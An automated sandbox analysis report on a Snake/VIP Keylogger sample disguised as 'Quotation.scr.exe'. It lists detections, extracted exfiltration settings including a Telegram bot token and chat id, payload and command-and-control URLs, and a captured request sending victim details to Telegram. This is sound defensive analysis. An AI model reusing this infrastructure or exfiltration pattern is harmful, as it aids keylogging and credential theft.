
Windows Analysis Report
Quotation.scr.exe

Overview

General Information

Sample name: Quotation.scr.exe
Analysis ID: 1507754
MD5: e0a5ee16dd5018801a0afadb2559b555
SHA1: 26443711531805d3e268212b552632558e90a015
SHA256: 6b89ca3745f66447d9dab6fc2bd79820dd3ee4ce5edc40c25d1c7bf2c9250352
Tags: exe

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quotation.scr.exe (PID: 3108 cmdline: "C:\Users\user\Desktop\Quotation.scr.exe" MD5: E0A5EE16DD5018801A0AFADB2559B555)
    • RegAsm.exe (PID: 2432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat id": "2052461776", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat_id": "2052461776", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d604:$a1: get_encryptedPassword
  • 0x2d921:$a2: get_encryptedUsername
  • 0x2d414:$a3: get_timePasswordChanged
  • 0x2d51d:$a4: get_passwordField
  • 0x2d61a:$a5: set_encryptedPassword
  • 0x2ecf8:$a7: get_logins
  • 0x2ec5b:$a10: KeyLoggerEventArgs
  • 0x2e8c0:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
0.2.Quotation.scr.exe.5790000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-09T08:55:17.814271+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49719 | 188.114.96.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-09T08:55:16.251452+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:17.251451+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:18.642109+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49720 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:21.173447+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49723 | 132.226.8.169 | 80 | TCP
2024-09-09T08:55:23.548357+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49725 | 132.226.8.169 | 80 | TCP


AV Detection

Source: Quotation.scr.exe | Avira: detected
Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat_id": "2052461776", "Version": "4.4"}
Source: 2.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat id": "2052461776", "Version": "4.4"}
Source: Quotation.scr.exe | Virustotal: Detection: 28%
Source: Quotation.scr.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Quotation.scr.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Quotation.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 135.181.160.46:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: Quotation.scr.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 0586B850h | 0_2_0586B790
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 0586B850h | 0_2_0586B798
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 05865041h | 0_2_05864FD0
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 05865041h | 0_2_05864FE0
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 05865041h | 0_2_058651D0
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 0586490Ch | 0_2_05864899
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 0586490Ch | 0_2_058648A8
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 058D4C3Ch | 0_2_058D4BB0
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 058D1773h | 0_2_058D1546
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 058D1773h | 0_2_058D144B
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then jmp 058D1773h | 0_2_058D1458
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 0_2_058D0006
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 0_2_058D0040
Source: C:\Users\user\Desktop\Quotation.scr.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 0_2_0593D578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 012DF5C5h | 2_2_012DF428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 012DF5C5h | 2_2_012DF614
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 012DFD81h | 2_2_012DFAC8

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /Mytiypg.vdf HTTP/1.1 | Host: eg-mart.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49725 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49719 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: eg-mart.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 09 Sep 2024 06:55:35 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://eg-mart.com
Source: Quotation.scr.exe | String found in binary or memory: https://eg-mart.com/Mytiypg.vdf
Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002ED5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 135.181.160.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2

                    System Summary

                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
